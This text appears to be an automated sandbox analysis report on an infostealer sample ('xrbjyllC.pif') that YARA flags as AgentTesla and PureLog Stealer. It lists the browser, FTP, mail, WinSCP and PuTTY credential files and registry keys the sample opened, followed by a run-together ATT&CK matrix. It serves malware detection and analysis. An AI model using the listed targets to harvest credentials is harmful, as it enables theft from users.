                  Source: Yara matchFile source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\FTP Navigator\Ftplist.txt
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		1
                  Valid Accounts                  		121
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		1
                  Exfiltration Over Alternative Protocol                  		Abuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Valid Accounts                  		11
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  System Network Connections Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Shared Modules                  		1
                  Valid Accounts                  		1
                  Access Token Manipulation                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		2
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Command and Scripting Interpreter                  		11
                  Registry Run Keys / Startup Folder                  		311
                  Process Injection                  		3
                  Software Packing                  		NTDS47
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                  Registry Run Keys / Startup Folder                  		1
                  Timestomp                  		LSA Secrets1
                  Query Registry                  		SSH1
                  Clipboard Data                  		123
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials361
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                  Masquerading                  		DCSync151
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Valid Accounts                  		Proc Filesystem2
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
                  Virtualization/Sandbox Evasion                  		Network Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                  Process Injection                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Hidden Files and Directories                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
